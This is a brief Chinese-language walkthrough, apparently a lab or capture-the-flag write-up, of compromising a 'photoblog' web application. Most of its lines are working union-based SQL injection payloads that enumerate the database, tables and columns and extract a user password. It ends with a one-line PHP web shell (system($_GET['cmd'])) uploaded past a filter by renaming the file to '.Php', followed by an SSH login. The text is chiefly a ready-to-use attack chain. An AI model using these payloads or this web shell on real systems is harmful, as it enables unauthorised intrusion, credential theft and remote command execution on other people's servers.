通过浏览页面发现存在3个可能的注入点
加入'试探都报错,均可注入,我这里选择2010即id=3的位置,这里没有图片遮挡
1.判断查询类型:id=3 or '1'='1' -- 1 返回正常页面,为字符型
2.判断前面的查询字段数: order by 4-- 1返回正常,order by 5-- 1报错说没有这列,确定为4列。
也可以用 union select 1,2,3,4-- 1 返回正常,确定2为回显位 union select 1,2,3,4,5-- 1时报错
3.查数据库名,id=3 union select 1,database(),3,4-- 1 确定数据库名为photoblog
4.查询表名:id=3 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='photoblog'-- 1
5.查询列名: id=3 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'-- 1
6.查询账号密码:id=3 union select 1,password,3,4 from users limit 0,1-- 1
7.解码得到密码为:P4ssw0rd
8.登录,发现有一个文件上传
9.写一句话木马文件 <?phpsystem($_GET['cmd']);?> 保存为yijuhua.Php,上传
报错,不允许php修改文件名为 yijuhua.Php 上传,成功
10.用xshell链接ssh IP